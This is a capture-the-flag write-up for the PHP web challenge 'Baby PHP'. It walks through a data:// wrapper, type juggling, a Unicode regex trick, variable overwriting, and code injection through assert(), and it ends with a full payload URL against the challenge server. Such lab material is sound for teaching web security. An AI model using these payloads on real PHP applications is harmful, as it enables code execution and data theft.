# Baby PHP
- Category : Web
- Points : Dynamic
- Flag: `REDACTED`

## Challenge
PHP is a popular general-purpose scripting language that is especially suited to web development.

Fast, flexible and pragmatic, PHP powers everything from your blog to the most popular websites in the world.

Can you untangle this mess?!

## Test 1
```
@$msg = $_GET['msg'];
if(@file_get_contents($msg)!=="Hello Challenge!"){
die('Wow so rude!!!!1');
}
```
Need to set the variable `msg` that is equal to `Hello Challenge!`. In order to do this you can put the b64 string as data to be read in like a file. \
`msg=data://text/plain;base64,SGVsbG8gQ2hhbGxlbmdlIQ`

## Test 2
```
if(intval($k1) !== $cc || $k1 === $cc){
die("lol no\n");
}
```
This is basic [PHP Type Juggling.](http://php.net/manual/en/language.types.type-juggling.php) You need to get the intval of the key you enter to be equal to cc(`1337`) without it being literally the same. By appending e0 to the end it will evaluate as 1337 * 10^0 and will be different literally from 1337. \
`key1=1337e0`

## Test 3
```
if(strlen($k2) == $bb){
if(preg_match('/^\d+＄/', $k2) && !is_numeric($k2)){
if($k2 == $cc){
@$cc = $_GET['cc'];
}
}
}
```
For this test the value you input for key2 is evaluated against $bb(42). Then it is put through a regex which states that it must be digits at the start ending with the special character ＄ that must also not be numeric. The dollar sign is a bit tricky because normally in regex that denotes the end of string but it is actually a special unicode $ character. What the regex actually states is that it must be digits unitl the special character and then does not check after that. To pass the eval vs cc which is still 1337 you can put 1337＄ then pad with a to reach the length needed, and the cc is open for you to input. \
`key2=1337＄aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa`

## Test 4
```
if(substr($cc, $bb) === sha1($cc)){
foreach ($_GET as $lel => $hack){
$$lel = $hack;
}
}
```
This test checks if the substring of cc after char bb is equal to the hash of cc. This is impossible because you cannot make a hash that is equal to itself and would run into a constantly changing hash when modifying it. By passing it an array this check is null and automatically passes as true. The value of cc is not important other than then fact you initialize it as an array. After that the [foreach](http://php.net/manual/en/control-structures.foreach.php) function iterates over the values in the array that are added after cc and creates new variables that are added globally. This is important for the next test. \
`cc[]=1234`

## Test 5
```
$‮b = "2";$a="‮b";//;1=b

if($$a !== $k1){
die("lel no\n");
}
```
Looking at the weird string at the top, I figured it probably did something but couldn't quite figure it out so I just worked with the function in the previous test. I could overwrite variables now so I made a new k1 that was equal to 2 and then made another variable named hack that I hoped would be passed to $a and it magically was. So k1=2 and then hack=a=k1 which made the test pass.\
`k1=2` `hack=k1 `

## Final Test
```
// plz die now
assert_options(ASSERT_BAIL, 1);
assert("$bb == $cc");

echo "Good Job ;)";
// TODO
// echo $flag;
```
For the final test it uses the assert function which returns a bool. If ASSERT_BAIL == 1 then the program will die on a false hit. Another interesting feature about [assert](http://php.net/manual/en/function.assert.php) is that it executes the code which is inside of it. So I can make a new variable $bb that runs the print flag command and then comments out the rest making the assert true and printing the flag.
`bb=print($flag) ;//`

Final url inject:\
https://arcade.fluxfingers.net:1819/?msg=data://text/plain;base64,SGVsbG8gQ2hhbGxlbmdlIQ&key1=1337e0&key2=1337%EF%BC%84aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&cc[]=1234&k1=2&hack=k1&bb=print($flag)%20;//